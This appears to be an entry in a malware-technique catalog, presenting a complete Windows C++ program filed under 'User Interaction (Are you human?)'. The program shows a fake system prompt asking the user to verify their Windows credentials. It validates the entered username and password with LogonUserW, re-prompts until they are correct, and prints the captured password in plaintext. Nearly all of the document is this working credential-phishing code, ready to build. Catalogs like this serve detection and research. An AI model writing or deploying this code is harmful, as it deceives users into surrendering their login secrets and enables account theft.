Windows C++ / User Interaction (Are you human?)
Author | Halil Dalabasmaz |
Platform | Windows |
Language | C++ |
Technique | User Interaction (Are you human?) |
Code
#include <Windows.h>
#include <tchar.h>
#include <CommCtrl.h>
#include <wincred.h>
#include <iostream>
#include <atlstr.h>
#pragma comment(lib, "comctl32.lib")
#pragma comment(lib, "Credui.lib")
void pickl3() {
BOOL loginStatus = FALSE;
do {
CREDUI_INFOW credui = {};
credui.cbSize = sizeof(credui);
credui.hwndParent = nullptr;
//credui.pszMessageText = L"...";
credui.pszCaptionText = L"Please verify your Windows user credentials to proceed.";
credui.hbmBanner = nullptr;
ULONG authPackage = 0;
LPVOID outCredBuffer = nullptr;
ULONG outCredSize = 0;
BOOL save = false;
DWORD err = 0;
err = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);
if (err == ERROR_SUCCESS) {
WCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
WCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];
WCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
DWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;
DWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;
DWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;
CredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);
WCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
WCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
CredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);
HANDLE handle = nullptr;
loginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);
if (loginStatus == TRUE) {
CloseHandle(handle);
std::wcout << "\n[+] Valid credential is entered as " << pszUName << ":" << pszPwd;
break;
}
else {
std::wcout << "\n[-] Invalid credential is entered as " << pszUName << ":" << pszPwd;
loginStatus = FALSE;
}
}
} while (loginStatus == FALSE);
}
int main () {
pickl3();
return 0;
}
Created
July 27, 2021
Last Revised
April 22, 2024